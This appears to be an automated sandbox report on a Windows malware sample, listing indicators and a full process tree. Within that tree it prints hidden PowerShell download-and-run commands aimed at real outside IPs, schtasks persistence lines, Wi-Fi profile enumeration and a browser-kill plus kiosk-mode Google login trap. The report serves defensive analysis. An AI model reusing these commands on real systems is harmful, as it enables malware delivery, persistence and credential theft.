Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings BUZd3Mq.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5748 schtasks.exe 3524 schtasks.exe 4176 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4004 powershell.exe 4004 powershell.exe 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 5412 rapes.exe 5412 rapes.exe 4412 Build.exe 4412 Build.exe 4412 Build.exe 4412 Build.exe 4412 Build.exe 4412 Build.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 408 powershell.exe 408 powershell.exe 408 powershell.exe 3944 Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE 3944 Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 2372 powershell.exe 2372 powershell.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 2372 powershell.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 1632 2asf3YX.exe 692 rapes.exe 692 rapes.exe 4872 483d2fa8a0d53818306efeb32d3.exe 4872 483d2fa8a0d53818306efeb32d3.exe 5408 cfaa592634.exe 5408 cfaa592634.exe 3356 38d8b16662.exe 3356 38d8b16662.exe 3356 38d8b16662.exe 3356 38d8b16662.exe 2328 39510de4d4.exe 2328 39510de4d4.exe 2428 5a2f7a55bb.exe 2428 5a2f7a55bb.exe 2428 5a2f7a55bb.exe 2428 5a2f7a55bb.exe 2428 5a2f7a55bb.exe 2428 5a2f7a55bb.exe 4796 32376a73b4.exe 4796 32376a73b4.exe 4796 32376a73b4.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 4412 Build.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 1632 2asf3YX.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 5848 38d8b16662.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 5092 taskkill.exe Token: SeDebugPrivilege 4580 taskkill.exe Token: SeDebugPrivilege 3636 taskkill.exe Token: SeDebugPrivilege 3160 taskkill.exe Token: SeDebugPrivilege 4100 firefox.exe Token: SeDebugPrivilege 4100 firefox.exe Token: SeDebugPrivilege 3740 972bad5e2c.exe Token: SeDebugPrivilege 772 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
pid Process 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 3836 947ced5026.exe 3836 947ced5026.exe 3836 947ced5026.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 3836 947ced5026.exe 3836 947ced5026.exe 3836 947ced5026.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 4100 firefox.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe 2660 db46c2dee3.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4100 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4392 wrote to memory of 3816 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 90 PID 4392 wrote to memory of 3816 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 90 PID 4392 wrote to memory of 3816 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 90 PID 4392 wrote to memory of 4176 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 91 PID 4392 wrote to memory of 4176 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 91 PID 4392 wrote to memory of 4176 4392 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe 91 PID 3816 wrote to memory of 3524 3816 cmd.exe 93 PID 3816 wrote to memory of 3524 3816 cmd.exe 93 PID 3816 wrote to memory of 3524 3816 cmd.exe 93 PID 4176 wrote to memory of 4004 4176 mshta.exe 94 PID 4176 wrote to memory of 4004 4176 mshta.exe 94 PID 4176 wrote to memory of 4004 4176 mshta.exe 94 PID 4004 wrote to memory of 3316 4004 powershell.exe 101 PID 4004 wrote to memory of 3316 4004 powershell.exe 101 PID 4004 wrote to memory of 3316 4004 powershell.exe 101 PID 3316 wrote to memory of 5412 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 102 PID 3316 wrote to memory of 5412 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 102 PID 3316 wrote to memory of 5412 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 102 PID 5412 wrote to memory of 2432 5412 rapes.exe 106 PID 5412 wrote to memory of 2432 5412 rapes.exe 106 PID 5412 wrote to memory of 2432 5412 rapes.exe 106 PID 2432 wrote to memory of 1872 2432 BUZd3Mq.exe 107 PID 2432 wrote to memory of 1872 2432 BUZd3Mq.exe 107 PID 2432 wrote to memory of 1872 2432 BUZd3Mq.exe 107 PID 2432 wrote to memory of 4412 2432 BUZd3Mq.exe 108 PID 2432 wrote to memory of 4412 2432 BUZd3Mq.exe 108 PID 2432 wrote to memory of 4412 2432 BUZd3Mq.exe 108 PID 4412 wrote to memory of 3648 4412 Build.exe 109 PID 4412 wrote to memory of 3648 4412 Build.exe 109 PID 4412 wrote to memory of 3648 4412 Build.exe 109 PID 3648 wrote to memory of 224 3648 cmd.exe 111 PID 3648 wrote to memory of 224 3648 cmd.exe 111 PID 3648 wrote to memory of 224 3648 cmd.exe 111 PID 3648 wrote to memory of 380 3648 cmd.exe 112 PID 3648 wrote to memory of 380 3648 cmd.exe 112 PID 3648 wrote to memory of 380 3648 cmd.exe 112 PID 3648 wrote to memory of 4388 3648 cmd.exe 113 PID 3648 wrote to memory of 4388 3648 cmd.exe 113 PID 3648 wrote to memory of 4388 3648 cmd.exe 113 PID 4412 wrote to memory of 5716 4412 Build.exe 117 PID 4412 wrote to memory of 5716 4412 Build.exe 117 PID 4412 wrote to memory of 5716 4412 Build.exe 117 PID 5716 wrote to memory of 5424 5716 cmd.exe 119 PID 5716 wrote to memory of 5424 5716 cmd.exe 119 PID 5716 wrote to memory of 5424 5716 cmd.exe 119 PID 5716 wrote to memory of 4020 5716 cmd.exe 120 PID 5716 wrote to memory of 4020 5716 cmd.exe 120 PID 5716 wrote to memory of 4020 5716 cmd.exe 120 PID 5412 wrote to memory of 3836 5412 rapes.exe 121 PID 5412 wrote to memory of 3836 5412 rapes.exe 121 PID 5412 wrote to memory of 3836 5412 rapes.exe 121 PID 3836 wrote to memory of 5708 3836 947ced5026.exe 122 PID 3836 wrote to memory of 5708 3836 947ced5026.exe 122 PID 3836 wrote to memory of 5708 3836 947ced5026.exe 122 PID 3836 wrote to memory of 4560 3836 947ced5026.exe 123 PID 3836 wrote to memory of 4560 3836 947ced5026.exe 123 PID 3836 wrote to memory of 4560 3836 947ced5026.exe 123 PID 5708 wrote to memory of 4176 5708 cmd.exe 125 PID 5708 wrote to memory of 4176 5708 cmd.exe 125 PID 5708 wrote to memory of 4176 5708 cmd.exe 125 PID 4560 wrote to memory of 3924 4560 mshta.exe 126 PID 4560 wrote to memory of 3924 4560 mshta.exe 126 PID 4560 wrote to memory of 3924 4560 mshta.exe 126 PID 5412 wrote to memory of 3664 5412 rapes.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3524
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE"C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"7⤵
- System Location Discovery: System Language Discovery
PID:1872
-
-
C:\Users\Admin\AppData\Local\Temp\Build.exe"C:\Users\Admin\AppData\Local\Temp\Build.exe"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4412 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:224
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:380
-
-
C:\Windows\SysWOW64\findstr.exefindstr All9⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 24448⤵
- Program crash
PID:6076
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5716 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:5424
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4020
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe"C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 3ZH31ma8PTZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5708 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 3ZH31ma8PTZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4176
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924 -
C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE"C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:3664 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "JopyNmaOIUL" /tr "mshta \"C:\Temp\CvQR3Yfqh.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5748
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\CvQR3Yfqh.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4872
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe"C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5408 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5848 -
C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"7⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 8087⤵
- Program crash
PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe"C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2328 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe"C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe"C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe"C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe"C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe"C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2660 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:5716
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4100 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd3dbb1d-fba4-42f0-a972-06926ad8d09b} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" gpu9⤵PID:5936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1825d3-0f3d-4642-adca-711fb662a830} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" socket9⤵PID:876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3328 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 3296 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a4f4dc1-beea-4d53-b9ff-3564a14c4620} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab9⤵PID:5552
-
-
